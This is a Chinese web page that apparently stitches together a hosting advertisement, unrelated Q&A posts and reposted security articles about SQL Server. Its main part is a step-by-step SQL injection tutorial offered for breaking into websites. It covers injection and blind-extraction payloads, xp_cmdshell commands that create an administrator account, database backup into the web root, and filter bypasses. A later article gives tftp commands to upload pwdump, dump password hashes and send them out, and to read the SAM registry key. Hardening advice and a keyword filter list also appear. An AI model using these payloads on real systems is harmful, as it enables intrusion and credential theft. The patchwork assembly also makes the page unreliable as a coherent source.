sqlserver跳板的简单介绍

什么是sql 注入，如何实现注入？

找了一个，希望能帮助你

让客户满意是我们工作的目标，不断超越客户的期望值来自于我们对这个行业的热爱。我们立志把好的技术通过有效、简单的方式提供给客户，将通过不懈努力成为客户在信息化领域值得信任、有价值的长期合作伙伴，公司提供的服务项目有：域名注册、雅安服务器托管、营销软件、网站建设、铜鼓网站维护、网站推广。

随着B/S模式应用开发的发展，使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高，程序员的水平及经验也参差不齐，相当大一部分程序员在编写代码的时候，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一段数据库查询代码，根据程序返回的结果，获得某些他想得知的数据，这就是所谓的SQL Injection，即SQL注入。

SQL注入是从正常的WWW端口访问，而且表面看起来跟一般的Web页面访问没什么区别，所以目前市面的防火墙都不会对SQL注入发出警报

，如果管理员没查看IIS日志的习惯，可能被入侵很长时间都不会发觉。

但是，SQL注入的手法相当灵活，在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析，构造巧妙的SQL语句，从而成功获取想要的数据，是高手与“菜鸟”的根本区别。

根据国情，国内的网站用ASP+Access或SQLServer的占70%以上，PHP+MySQ占L20%，其他的不足10%。在本文，我们从分入门、进阶至高级讲解一下ASP注入的方法及技巧，PHP注入的文章由NB联盟的另一位朋友zwell撰写，希望对安全工作者和程序员都有用处。了解 ASP注入的朋友也请不要跳过入门篇，因为部分人对注入的基本判断方法还存在误区。大家准备好了吗？Let's Go...

入门篇

如果你以前没试过SQL注入的话，那么第一步先把IE菜单=工具=Internet选项=高级=显示友好 HTTP 错误信息前面的勾去掉。否则，不论服务器返回什么错误，IE都只显示为HTTP 500服务器错误，不能获得更多的提示信息。

第一节、SQL注入原理

以下我们从一个网站开始（注：本文发表前已征得该站站长同意，大部分都是真实数据）。

在网站首页上，有名为“IE不能打开新窗口的多种解决方法”的链接，地址为：，我们在这个地址后面加上单引号’，服务器会返回下面的错误提示：

Microsoft JET Database Engine 错误 '80040e14'

字符串的语法错误 在查询表达式 'ID=49'' 中。

/showdetail.asp，行8

从这个错误提示我们能看出下面几点：

1. 网站使用的是Access数据库，通过JET引擎连接数据库，而不是通过ODBC。

2. 程序没有判断客户端提交的数据是否符合程序要求。

3. 该SQL语句所查询的表中有一名为ID的字段。

从上面的例子我们可以知道，SQL注入的原理，就是从客户端提交特殊的代码，从而收集程序及服务器的信息，从而获取你想到得到的资料。

第二节、判断能否进行SQL注入

看完第一节，有一些人会觉得：我也是经常这样测试能否注入的，这不是很简单吗？

其实，这并不是最好的方法，为什么呢？

首先，不一定每台服务器的IIS都返回具体错误提示给客户端，如果程序中加了cint(参数)之类语句的话，SQL注入是不会成功的，但服务器同样会报错，具体提示信息为处理 URL 时服务器上出错。请和系统管理员联络。

其次，部分对SQL注入有一点了解的程序员，认为只

要把单引号过滤掉就安全了，这种情况不为少数，如果你用单引号测试，是测不到注入点的

那么，什么样的测试方法才是比较准确呢？答案如下：

①

② ;and 1=1

③ ;and 1=2

这就是经典的1=1、1=2测试法了，怎么判断呢？看看上面三个网址返回的结果就知道了：

可以注入的表现：

① 正常显示（这是必然的，不然就是程序有错误了）

② 正常显示，内容基本与①相同

③ 提示BOF或EOF（程序没做任何判断时）、或提示找不到记录（判断了rs.eof时）、或显示内容为空（程序加了on error resume next）

不可以注入就比较容易判断了，①同样正常显示，②和③一般都会有程序定义的错误提示，或提示类型转换时出错。

当然，这只是传入参数是数字型的时候用的判断方法，实际应用的时候会有字符型和搜索型参数，我将在中级篇的“SQL注入一般步骤”再做分析。

第三节、判断数据库类型及注入方法

不同的数据库的函数、注入方法都是有差异的，所以在注入之前，我们还要判断一下数据库的类型。一般ASP最常搭配的数据库是Access和SQLServer，网上超过99%的网站都是其中之一。

怎么让程序告诉你它使用的什么数据库呢？来看看：

SQLServer有一些系统变量，如果服务器IIS提示没关闭，并且SQLServer返回错误提示的话，那可以直接从出错信息获取，方法如下：

;and user0

这句语句很简单，但却包含了SQLServer特有注入方法的精髓，我自己也是在一次无意的测试中发现这种效率极高的猜解方法。让我看来看看它的含义：首先，前面的语句是正常的，重点在and user0，我们知道，user是SQLServer的一个内置变量，它的值是当前连接的用户名，类型为nvarchar。拿一个 nvarchar的值跟int的数0比较，系统会先试图将nvarchar的值转成int型，当然，转的过程中肯定会出错，SQLServer的出错提示是：将nvarch

ar值 ”abc” 转换数据类型为 int 的列时发生语法错误，呵呵，abc正是变量user的值，这样，不废吹灰之力就拿到了数据库的用户名。在以后的篇幅里，大家会看到很多用这种方法的语句。

顺便说几句，众所周知，SQLServer的用户sa是个等同Adminstrators权限的角色，拿到了sa权限，几乎肯定可以拿到主机的 Administrator了。上面的方法可以很方便的测试出是否是用sa登录，要注意的是：如果是sa登录，提示是将”dbo”转换成int的列发生错误，而不是”sa”。

如果服务器IIS不允许返回错误提示，那怎么判断数据库类型呢？我们可以从Access和SQLServer和区别入手，Access和 SQLServer都有自己的系统表，比如存放数据库中所有对象的表，Access是在系统表[msysobjects]中，但在Web环境下读该表会提示“没有权限”，SQLServer是在表[sysobjects]中，在Web环境下可正常读取。

在确认可以注入的情况下，使用下面的语句：

;and (select count(*) from sysobjects)0

;and (select count(*) from msysobjects)0

如果数据库是SQLServer，那么第一个网址的页面与原页面 49是大致相同的；而第二个网址，由于找不到表msysobjects，会提示出错，就算程序有容错处理，页面也与原页面完全不同。

如果数据库用的是Access，那么情况就有所不同，第一个网址的页面与原页面完全不同；第二个网址，则视乎数据库设置是否允许读该系统表，一般来说是不允许的，所以与原网址也是完全不同。大多数情况下，用第一个网址就可以得知系统所用的数据库类型，第二个网址只作为开启IIS错误提示时的验证。

进阶篇

在入门篇，我们学会了SQL注入的判断方法，但真正要拿到网站的保密内容，是远远不够的。接下来，我们就继续学习如何从数据库中获取想要获得的内容，首先，我们先看看SQL注入的一般步骤：

第一节、SQL注入的一般步骤

首先，判断环境，寻找注入点，判断数据库类型，这在入门篇已经讲过了。

其次，根据注入参数类型，在脑海中重构SQL语句的原貌，按参数类型主要分为下面三种：

(A) ID=49 这类注入的参

数是数字型，SQL语句原貌大致如下：

Select * from 表名 where 字段=49

注入的参数为ID=49 And [查询条件]，即是生成语句：

Select * from 表名 where 字段=49 And [查询条件]

(B) Class=连续剧 这类注入的参数是字符型，SQL语句原貌大致概如下：

Select * from 表名 where 字段=’连续剧’

注入的参数为Class=连续剧’ and [查询条件] and ‘’=’ ，即是生成语句：

Select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’

© 搜索时没过滤参数的，如keyword=关键字，SQL语句原貌大致如下：

Select * from 表名 where 字段like ’%关键字%’

注入的参数为keyword=’ and [查询条件] and ‘%25’=’， 即是生成语句：

Select * from 表名 where字段like ’%’ and [查询条件] and ‘%’=’%’

接着，将查询条件替换成SQL语句，猜解表名，例如：

ID=49 And (Select Count(*) from Admin)=0

如果页面就与ID=49的相同，说明附加条件成立，即表Admin存在，反之，即不存在（请牢记这种方法）。如此循环，直至猜到表名为止。

表名猜出来后，将Count(*)替换成Count(字段名)，用同样的原理猜解字段名。

有人会说：这里有一些偶然的成分，如果表名起得很复杂没规律的，那根本就没得玩下去了。说得很对，这世界根本就不存在100%成功的黑客技术，苍蝇不叮无缝的蛋，无论多技术多高深的黑客，都是因为别人的程序写得不严密或使用者保密意识不够，才有得下手。

有点跑题了，话说回来，对于SQLServer的库，还是有办法让程序告诉我们表名及字段名的，我们在高级篇中会做介绍。

最后，在表名和列名猜解成功后，再使用SQL语句，得出字段的值，下面介绍一种最常用的方法－Ascii逐字解码法，虽然这种方法速度很慢，但肯定是可行的方法。

我们举个例子，已知表Admin中存在username字段，首先，我们取第一条记录，测试长度：

;and (select top 1 len(username) from Admin)0

先说明原理：如果top 1的username长度大于0，则条件成立；接着就是1、2、3这样测试下去，一直到条件不成立为止，比如7成立，8不成立，就是len(username)=8

当然没人会笨得从0,1,2,3一个个测试，怎么样才比较快就看各自发挥了。在得到username的长度后，用mid(username,N,1)截取第N位字符，再asc(mid(username,N,1))得到ASCII码，比如：

id=49 and (select top 1 asc(mid(username,1,1)) from Admin)0

同样也是用逐步缩小范围的方法得到第1位字符的ASCII码，注意的是英文和数字的ASCII码在1-128之间，可以用折半法加速猜解，如果写成程序测试，效率会有极大的提高。

第二节、SQL注入常用函数

有SQL语言基础的人，在SQL注入的时候成功率比不熟悉的人高很多。我们有必要提高一下自己的SQL水平，特别是一些常用的函数及命令。

Access：asc(字符) SQLServer：unicode(字符)

作用：返回某字符的ASCII码

Access：chr(数字) SQLServer：nchar(数字)

作用：与asc相反，根据ASCII码返回字符

Access：mid(字符串,N,L) SQLServer：substring(字符串,N,L)

作用：返回字符串从N个字符起长度为L的子字符串，即N到N+L之间的字符串

Access：abc(数字) SQLServer：abc (数字)

作用：返回数字的绝对值（在猜解汉字的时候会用到）

Access：A between B And C SQLServer：A between B And C

作用：

判断A是否界于B与C之间

第三节、中文处理方法

在注入中碰到中文字符是常有的事，有些人一碰到中文字符就想打退堂鼓了。其实只要对中文的编码有所了解，“中文恐惧症”很快可以克服。

先说一点常识：

Access中，中文的ASCII码可能会出现负数，取出该负数后用abs()取绝对值，汉字字符不变。

SQL Server中，中文的ASCII为正数，但由于是UNICODE的双位编码，不能用函数ascii()取得ASCII码，必须用函数unicode ()返回unicode值，再用nchar函数取得对应的中文字符。

了解了上面的两点后，是不是觉得中文猜解其实也跟英文差不多呢？除了使用的函数要注意、猜解范围大一点外，方法是没什么两样的。

高级篇

看完入门篇和进阶篇后，稍加练习，破解一般的网站是没问题了。但如果碰到表名列名猜不到，或程序作者过滤了一些特殊字符，怎么提高注入的成功率？怎么样提高猜解效率？请大家接着往下看高级篇。

第一节、利用系统表注入SQLServer数据库

SQL Server是一个功能强大的数据库系统，与操作系统也有紧密的联系，这给开发者带来了很大的方便，但另一方面，也为注入者提供了一个跳板，我们先来看看几个具体的例子

：

① ;exec master..xp_cmdshell “net user name password /add”--

分号;在SQLServer中表示隔开前后两句语句，--表示后面的语句为注释，所以，这句语句在SQLServer中将被分成两句执行，先是Select出ID=1的记录，然后执行存储过程xp_cmdshell，这个存储过程用于调用系统命令，于是，用net命令新建了用户名为name、密码为password的windows的帐号，接着：

② ;exec master..xp_cmdshell “net localgroup name administrators /add”--

将新建的帐号name加入管理员组，不用两分钟，你已经拿到了系统最高权限！当然，这种方法只适用于用sa连接数据库的情况，否则，是没有权限调用xp_cmdshell的。

③ ;and db_name()0

前面有个类似的例子and user0，作用是获取连接用户名，db_name()是另一个系统变量，返回的是连接的数据库名。

④ ;backup database 数据库名 to disk=’c:\inetpub\wwwroot\1.db’;--

这是相当狠的一招，从③拿到的数据库名，加上某些IIS出错暴露出的绝对路径，将数据库备份到Web目录下面，再用HTTP把整个数据库就完完整整的下载回来，所有的管理员及用户密码都一览无遗！在不知道绝对路径的时候，还可以备份到网络地址的方法（如\202.96.xx.xx\Share \1.db），但成功率不高。

⑤ ;and (Select Top 1 name from sysobjects where xtype=’U’ and status0)0

前面说过，sysobjects是SQLServer的系统表，存储着所有的表名、视图、约束及其它对象，xtype=’U’ and status0，表示用户建立的表名，上面的语句将第一个表名取出，与0比较大小，让报错信息把表名暴露出来。第二、第三个表名怎么获取？还是留给我们聪明的读者思考吧。

⑥ ;and (Select Top 1 col_name(object_id(‘表名’),1) from sysobjects)0

从⑤拿到表名后，用object_id(‘表名’)获取表名对应的内部ID，col_name(表名ID,1)代表该表的第1个字段名，将1换成2,3,4...就可以逐个获取所猜解表里面的字段名。

以上6点是我研究SQLServer注入半年多以来的心血结晶，可以看出，对SQLServer的了解程度，直接影响着成功率及猜解速度。在我研究SQLServer注入之后，我在开发方面的水平也得到很大的提高，呵呵，也许安全与开发本来就是相辅相成的吧。

第二节、绕过程序限制继续注入

在入门篇提到，有很多人喜欢用’号测试注入漏洞，所以也有很多人用过滤’号的方法来“防止”注入漏洞，这也许能挡住一些入门者的攻击，但对SQL注入比较熟悉的人，还是可以利用相关的函数，达到绕过程序限制的目的。

在“SQL注入的一般步骤”一节中，我所用的语句，都是经过我优化，让其不包含有单引号的；在“利用系统表注入SQLServer数据库”中，有些语句包含有’号，我们举个例子来看

看怎么改造这些语句：

简单的如where xtype=’U’，字符U对应的ASCII码是85，所以可以用where xtype=char(85)代替；如果字符是中文的，比如where name=’用户’，可以用where name=nchar(29992)+nchar(25143)代替。

第三节、经验小结

1.有些人会过滤Select、Update、Delete这些关键字，但偏偏忘记区分大小写，所以大家可以用selecT这样尝试一下。

2.在猜不到字段名时，不妨看看网站上的登录表单，一般为了方便起见，字段名都与表单的输入框取相同的名字。

3.特别注意：地址栏的+号传入程序后解释为空格，%2B解释为+号，%25解释为%号，具体可以参考URLEncode的相关介绍。

4.用Get方法注入时，IIS会记录你所有的提交字符串，对Post方法做则不记录，所以能用Post的网址尽量不用Get。

5. 猜解Access时只能用Ascii逐字解码法，SQLServer也可以用这种方法，只需要两者之间的区别即可，但是如果能用SQLServer的报错信息把值暴露出来，那效率和准确率会有极大的提高。

防范方法

SQL注入漏洞可谓是“千里之堤，溃于蚁穴”，这种漏洞在网上极为普遍，通常是由于程序员对注入不了解，或者程序过滤不严格，或者某个参数忘记检查导致。在这里，我给大家一个函数，代替ASP中的Request函数，可以对一切的SQL注入Say NO，函数如下：

Function SafeRequest(ParaName,ParaType)

'--- 传入参数 ---

'ParaName:参数名称-字符型

'ParaType:参数类型-数字型(1表示以上参数是数字，0表示以上参数为字符)

Dim ParaValue

ParaValue=Request(ParaName)

If ParaType=1 then

If not isNumeric(ParaValue) then

Response.write "参数" ParaName "必须为数字型！"

Response.end

End if

Else

ParaValue=replace(ParaValue,"'","''")

End if

SafeRequest=ParaValue

End function

MS-SQLServer-2K-SP4怎么引起漏洞，又无法修复，请高手们指点哦。谢谢！！！

你机器安装了MS SQL了吗?

首先在安装策略中关闭1443端口,防火墙也要禁止.更新最新的补丁.

下面的文章,做个参考吧.

从codered到nimda等，一大堆蠕虫把原来需要人工利用的漏洞都变成了程序自动利用了，大家还想去手工操作这些IIS漏洞么？让我们调整重心，去看看服务器常用的数据库吧。

一般网站都是基于数据库的，特别是ASP、PHP、JSP这样的用数据库来动态显示的网站。很多网站可能多注意的是操作系统的漏洞，但是对数据库和这些脚本的安全总是忽略，也没有太多注意。

从最比较普遍的脚本问题开始，这些都是老话题了，大家可以参考Hectic写的《关于数据库的简单入侵和无赖破坏，以天融信做例子》，该文章对从SQL脚本问题说得非常详细。对于脚本安全的解决，也可以通过过滤来实现，可以参考我以前写的。对于ASP来说，可以使用下面这个过滤函数：

Function Filter_SQL(strData)

Dim strFilter

Dim blnFlag

Dim i

strFilter="’,;,//,--,@,_,exec,declare" ’需要过滤的字符，可以自己添加，","是分隔符

blnFlag=Flase ’过滤标志，如果产生过滤，那么就是真

Dim arrayFilter

arrayFilter=Split(strFilter,",")

For i=0 To UBound(arrayFilter)

If Instr(strData,arrayFilter(i))0 Then

blnFlag=True

Exit For

End If

Next

If blnFlag Then

Response.Redirect "wrong.asp"

’当发现有过滤操作时，导向一个预定页面。反正正常访问用不到的连接请求，总不是好事情。

Else

Filter_SQL=strData

End If

End Function

对于MS SQL

Server数据库来说，安全问题不仅仅局限在脚本上了。“天杀的微软”的系统性很强，整个基于WINDOWS系统的应用都有很强的关联性，对SQL

Server来说，基本可以把数据库管理和系统管理等同起来了。SQL

Server默认的管理员帐号“sa”的密码是空的，这给多数NT服务器产生一个安全漏洞。小榕的“SQLRCMD”，就能够利用获得的数据库管理员帐号执行系统命令。

在SQL Server中有很多系统存储过程，有些是数据库内部使用的，还有一些就是通过执行存储过程来调用系统命令。

系统存储过程：xp_cmdshell

就是以操作系统命令行解释器的方式执行给定的命令字符串。它就具体语法是：xp_cmdshell

{’command_string’} [, no_output]

xp_cmdshell在默认情况下，只有 sysadmin

的成员才能执行。但是，sysadmin也可以授予其他用户这个执行权限。在早期版本中，获得 xp_cmdshell

执行权限的用户在 SQL Server 服务的用户帐户中运行命令。可以通过配置选项配置 SQL Server，以便对 SQL

Server 无 sa 访问权限的用户能够在SQLExecutiveCmdExec Windows NT 帐户中运行

xp_cmdshell。在 SQL Server 7.0 中，该帐户称为 SQLAgentCmdExec。现在对于SQL

Server2000，只要有一个能执行该存储过程的帐号就可以直接运行命令了。

对于 NT 和 WIN2000，当用户不是 sysadmin 组的成员时，xp_cmdshell 将模拟使用

xp_sqlagent_proxy_account 指定的 SQL Server 代理程序的代理帐户。如果代理帐户不能用，则

xp_cmdshell 将失败。所以即使有一个帐户是master数据库的db_owner，也不能执行这个存储过程。

如果我们有一个能执行xp_cmdshell的数据库帐号，比如是空口令的sa帐号。那么我们可以执行这样的命令：

exec xp_cmdshell ’net user refdom 123456 /add’

exec xp_cmdshell ’net localgroup administrators refdom /add’

上面两次调用就在系统的管理员组中添加了一个用户：refdom

当我们获得数据库的sa管理员帐号后，就应该可以完全控制这个机器了。可见数据库安全的重要性。

下面这些存储过程都是对Public可以执行的：

xp_fileexist，用来确定一个文件是否存在。

xp_getfiledetails，可以获得文件详细资料。

xp_dirtree，可以展开你需要了解的目录，获得所有目录深度。

Xp_getnetname，可以获得服务器名称。

还有可以操作注册表的存储过程，这些不是对Public可以执行的，需要系统管理员或者授权执行：

Xp_regaddmultistring

Xp_regdeletekey

Xp_regdeletevalue

Xp_regenumvalues

Xp_regread （对Public可以执行）

Xp_regremovemultistring

Xp_regwrite

SQL Server的安全配置

除跟着微软打满所有补丁外，还需要加强数据库的安全。

首先，你需要加强象sa这样的帐号的密码，跟系统帐号的使用配置相似，一般操作数据库不要使用象sa这样的最高权限的帐号，而使用能满足你的要求的一般帐号。

接着对扩展存储过程开始大屠杀，首先就是xp_cmdshell，还有就是上面那些一大堆存储过程，都drop吧，一般也用不着。

执行：

use master

sp_dropextendedproc ’xp_cmdshell’

去掉guest帐号，阻止非授权用户访问。

去掉不必要的网络协议。

加强对数据库登陆的日志记录，最好记录所有登陆事件。可以用下面的简单DOS命令来查看日志：

findstr /C:"登录" d:\Microsoft SQL Server\MSSQL\LOG\*.*

用管理员帐号定期检查所有帐号，是否密码为空或者过于简单，比如下面的语句：

Use master

Select name,Password from syslogins where password is null

用下面语句对所有帐号，检查对存储过程和扩展存储过程的执行权，提防不必要的执行权限扩散：

Use master

Select sysobjects.name From sysobjects, sysprotects Where

sysprotects.uid = 0 AND xtype IN (’X’,’P’) AND sysobjects.id =

sysprotects.id

加强数据库的安全是非常重要的，有的数据库服务器是和WEB服务器隔离开的，这就同MAIL服务器一样，数据库的日志可能就基本很少去查看，这将会成为管理员的一个疏忽点。类似DNS、MAIL等等，数据库服务器往往成为各种入侵的跳板。

下面是一些关于数据库的问答和技巧：

1、获得SA权限后，却不能执行xp_cmdshell存储过程怎么办？

答：可能是已经把xp_cmdshell等扩展存储过程删除了，可以用这个存储过程把xp_cmdshell恢复。

sp_addextendedproc ’xp_cmdshell’, ’xpsql70.dll’

2、通过数据库用pwdump获得系统管理员密码

先上传一个pwdump

tftp -i GET pwdump3.exe pwdump3.exe

tftp -i GET lsaext.dll lsaext.dll

tftp -i GET pwservice.exe pwservice.exe

pwdump3 127.0.0.1 outfile.txt

tftp PUT outfile.txt outfile.txt

然后再用解密工具l0pht等等破解这些密码。

3、从数据库读取系统管理员密码。

能读出加密的密码是NT的"administrator"帐号也不能做的，SQL

Server能读出来是使用的“LocalSystem”帐号，这个帐号比administrator更高一级。可以使用下面这个存储过程。不过读出来的密码是经过加密后的，然后再解密吧。

xp_regread

’HKEY_LOCAL_MACHINE’,’SECURITY\SAM\Domains\Account’,’F’

我现在想在3个月之内学会数据库，现在我都不会但是工作需要我现在真的很急！！！

关键是你所说的数据库具体是那种数据库，一般现在常用的个人或小型的关系型数据库，有access和foxpro，三个月学习一般的应用应该没有问题；还有一些是免费的比较专业的小型的关系型数据库，如mysql，三个估计有些困难，因为其一般作为小型web应用的后台数据库来应用，而且必须搭配编程语言，如java等。对于专业一些的大型的数据库，如微软的sql server、甲骨文的oracle、IBM的db2等，三个月估计只能学习皮毛。这些数据库本身结构就相当的复杂，而且其安装、配置都是比较复杂，自身都带有专用与通用的SQL语言，配置专业的开发工具，学三个月是远远不够的。

我会这些东西，有公司要吗？

有的。很多东西，懂点，就是敲门砖。但可能实际岗位操作，就需要精通了。所以，自信点，要给面试官留下个良好的第一印象。不都说了：机会往往是留给有准备的人吗？

所以，面试时，好好准备，有些客套话（虽然没什么必要性），但建议还是准备些。

如何做好网络安全管理

第一、物理安全

除了要保证要有电脑锁之外，我们更多的要注意防火，要将电线和网络放在比较隐蔽的地方。我们还要准备UPS，以确保网络能够以持续的电压运行，在电子学中，峰值电压是一个非常重要的概念，峰值电压高的时候可以烧坏电器，迫使网络瘫痪，峰值电压最小的时候，网络根本不能运行。使用UPS可以排除这些意外。另外我们要做好防老鼠咬坏网线。

第二、系统安全（口令安全）

我们要尽量使用大小写字母和数字以及特殊符号混合的密码，但是自己要记住，我也见过很多这样的网管，他的密码设置的的确是复杂也安全，但是经常自己都记不来，每次都要翻看笔记本。另外我们最好不要使用空口令或者是带有空格的，这样很容易被一些黑客识破。

我们也可以在屏保、重要的应用程序上添加密码，以确保双重安全。

第三、打补丁

我们要及时的对系统补丁进行更新，大多数病毒和黑客都是通过系统漏洞进来的，例如今年五一风靡全球臭名昭著的振荡波就是利用了微软的漏洞ms04-011进来的。还有一直杀不掉的SQLSERVER上的病毒slammer也是通过SQL的漏洞进来的。所以我们要及时对系统和应用程序打上最新的补丁，例如IE、OUTLOOK、SQL、OFFICE等应用程序。

另外我们要把那些不需要的服务关闭，例如TELNET，还有关闭Guset帐号等。

第四、安装防病毒软件

病毒扫描就是对机器中的所有文件和邮件内容以及带有.exe的可执行文件进行扫描，扫描的结果包括清除病毒，删除被感染文件，或将被感染文件和病毒放在一台隔离文件夹里面。所以我们要对全网的机器从网站服务器到邮件服务器到文件服务器知道客户机都要安装杀毒软件，并保持最新的病毒定义码。我们知道病毒一旦进入电脑，他会疯狂的自我复制，遍布全网，造成的危害巨大，甚至可以使得系统崩溃，丢失所有的重要资料。所以我们要至少每周一次对全网的电脑进行集中杀毒，并定期的清除隔离病毒的文件夹。

现在有很多防火墙等网关产品都带有反病毒功能，例如netscreen总裁谢青旗下的美国飞塔Fortigate防火墙就是，她具有防病毒的功能。

第五、应用程序

我们都知道病毒有超过一半都是通过电子邮件进来的，所以除了在邮件服务器上安装防病毒软件之外，还要对PC机上的outlook防护，我们要提高警惕性，当收到那些无标题的邮件，或是你不认识的人发过来的，或是全是英语例如什么happy99，money，然后又带有一个附件的邮件，建议您最好直接删除，不要去点击附件，因为百分之九十以上是病毒。我前段时间就在一个政府部门碰到这样的情况，他们单位有三个人一直收到邮件，一个小时竟然奇迹般的收到了2000多封邮件，致使最后邮箱爆破，起初他们怀疑是黑客进入了他们的网络，最后当问到这几个人他们都说收到了一封邮件，一个附件，当去打开附件的时候，便不断的收到邮件了，直至最后邮箱撑破。最后查出还是病毒惹的祸。

除了不去查看这些邮件之外，我们还要利用一下outlook中带有的黑名单功能和邮件过虑的功能。

很多黑客都是通过你访问网页的时候进来的，你是否经常碰到这种情况，当你打开一个网页的时候，会不断的跳出非常多窗口，你关都关不掉，这就是黑客已经进入了你的电脑，并试图控制你的电脑。

所以我们要将IE的安全性调高一点，经常删除一些cookies和脱机文件，还有就是禁用那些Active X的控件。

第六、代理服务器

代理服务器最先被利用的目的是可以加速访问我们经常看的网站，因为代理服务器都有缓冲的功能，在这里可以保留一些网站与IP地址的对应关系。

要想了解代理服务器，首先要了解它的工作原理：

环境：局域网里面有一台机器装有双网卡，充当代理服务器，其余电脑通过它来访问网络。

1、内网一台机器要访问新浪，于是将请求发送给代理服务器。

2、代理服务器对发来的请求进行检查，包括题头和内容，然后去掉不必要的或违反约定的内容。

3、代理服务器重新整合数据包，然后将请求发送给下一级网关。

4、新浪网回复请求，找到对应的IP地址。

5、代理服务器依然检查题头和内容是否合法，去掉不适当的内容。

6、重新整合请求，然后将结果发送给内网的那台机器。

由此可以看出，代理服务器的优点是可以隐藏内网的机器，这样可以防止黑客的直接攻击，另外可以节省公网IP。缺点就是每次都要经由服务器，这样访问速度会变慢。另外当代理服务器被攻击或者是损坏的时候，其余电脑将不能访问网络。

第七、防火墙

提到防火墙，顾名思义，就是防火的一道墙。防火墙的最根本工作原理就是数据包过滤。实际上在数据包过滤的提出之前，都已经出现了防火墙。

数据包过滤，就是通过查看题头的数据包是否含有非法的数据，我们将此屏蔽。

举个简单的例子，假如体育中心有一场刘德华演唱会，检票员坐镇门口，他首先检查你的票是否对应，是否今天的，然后撕下右边的一条，将剩余的给你，然后告诉你演唱会现场在哪里，告诉你怎么走。这个基本上就是数据包过滤的工作流程吧。

你也许经常听到你们老板说：要增加一台机器它可以禁止我们不想要的网站，可以禁止一些邮件它经常给我们发送垃圾邮件和病毒等，但是没有一个老板会说：要增加一台机器它可以禁止我们不愿意访问的数据包。实际意思就是这样。接下来我们推荐几个常用的数据包过滤工具。

如何防止SQLserver服务器被黑

一、基本安全设定：

（1）文件系统的设定 windows2000server 支持多种文件系统，最安全的要数NTFS文件系统，如果你的windows2000server要用作服务器，最好将所有的分区都格式化为NTFS文件系统，fat32是不能用的。

（2）补丁（pack) 目前windows2000已经到sp4了，这个大补丁一定要装的，安装sp4后再到网络上升级，将微软提供的各种重要系统安全更新全部都升级，不要怕麻烦，这是防病毒和黑客攻击的非常重要安全设置步骤。

（3）帐号安全帐号是windows2000server的重要的安全保证，要注意区分一些工作组的权限： administrators是系统管理员组，administrator是系统默认的管理帐号，administrator最好设置一个复杂的密码，复杂到什么程度呢？简单的说，自己都要记不住这个密码，这个密码可以是字符、数字、符号、大小写的组合（如：AGgF!452KhtUN)，密码不要让别人猜得到，不要用自己得电话号码啦之类的东西，最好在笔记本上将密码设定好后再设置，设好密码后妥善保管记录密码的笔记本，每隔一段时间更改自己的密码 guest帐号最好禁止使用，如果没有必要，不要添加其他的系统管理员帐号。

（4）关闭不必要的服务在服务中将一些不常用的服务关闭（比如打印、远程注册表操作，信息发送等不必要的服务）。

（5）网络协议如果没有其他的用途，windows2000server只需要安装tcp/ip协议，其他不必要的协议统统删除。（6）如果没必要，IIS一定不要安装（如果需要安装iis，那么看后面的设置） IIS是windows2000server中最不安全的组件，不装IIS，windows2000将是很安全的。

(7)默认共享的删除 windows2000server默认的共享有以下几种 c$ d$ e$ ..... IPC$ ADMIN$ 这些默认共享一定要关，否者hk利用简单的Net use命令就可以将你的服务器黑掉下面提供简单的关闭这些共享的方法 A、建立一个批处理文件，如a.bat B、在该批处理文件中添加下面的语句 net share c$ /del (这是取消c盘的默认共享，同理 net share d$ /del 是取消d盘的共享，你有多少个盘符，就编多少个以上的语句） net share ipc$/del (删除ipc默认共享） net share admin$ /del （删除 admin默认共享） C 、将以上的语句添加完后，将该文件放入开始菜单中程序中启动文件夹中，让windows2000server每次启动都将默认的共享删除（7）CMD的设置 cmd.exe是windows2000中非常重要的文件，很多漏洞都是要*调用该个文件，该文件在windows2000server所在目录的system32中，我们需要对其进行设定 A、将该文件从system32中拷贝出来放在其他地方，将原来的文件删除 B、将拷贝出来的文件进行权限设定，只允许administrator访问，不允许其他任何的工作组或用户访问该文件。

（8）windows2000server终端服务(默认3389端口） windows2000server提供了远程终端服务，此服务方便了网络管理员对服务器的远程管理，但是，该服务也为黑客提供了非常危险的攻击，网络黑客口中的所谓跳板（肉鸡）绝大部分都是利用该功能进行自我隐蔽的攻击。一旦系统管理员的密码被破解，而该服务器又提供终端服务，黑客就可以完全控制了该服务器，不但服务器的各种资料会完全暴露，而且黑客还会利用这台服务器去攻击其他的服务器，因此该服务除非你觉得自己的服务器足够安全，否则最好不要打开，特别是暴露在互连网络中的服务器，打开该功能一定要小心谨慎。 A、如何知道自己的终端服务是否打开？终端服务需要安装，我们可以通过控制面板中的添加/删除程序中的添加/删除windows组件来安装，在windows组件向导列表中最下面有两个组件，一个是“终端服务”,一个是“终端服务授权”，我们只需要安装“终端服务”这个组件就可以将该功能启用，一旦启用了该功能，默认的情况下，我们的tcp3389端口就会打开。所以，我们看看这个地方，如果你的组件“终端服务”前面打了勾，就表明你已经打开了该服务。有些黑客手段很高明，一旦控制了你的计算机后，可以远程打开该服务，这种情况下，我们最好检查windows2000server启用了哪些服务，如何检查呢？打开windows2000server的服务管理（开始菜单——程序——管理工具——服务）。在服务列表中检查Terminal Services这项服务的状态，看看如果该服务处于“ 禁用”状态，说明该服务没打开，如果该服务处于“已启动”状态，说明该服务已经打开。 B、如何关闭该服务！第一步，通过控制面板中的添加/删除程序中的添加/删除windows组件来将该服务组件删除第二步，在服务中将Terminal Services服务禁用注意：需要经常检查该服务是否被非法启动，如果你在你没有启动该服务的情况下你发现它已打开，非常不幸，你的服务器已经被黑，成为了别人的跳板（肉鸡）最好的解决方法是重作服务器系统，不要以为关闭该服务就行了。

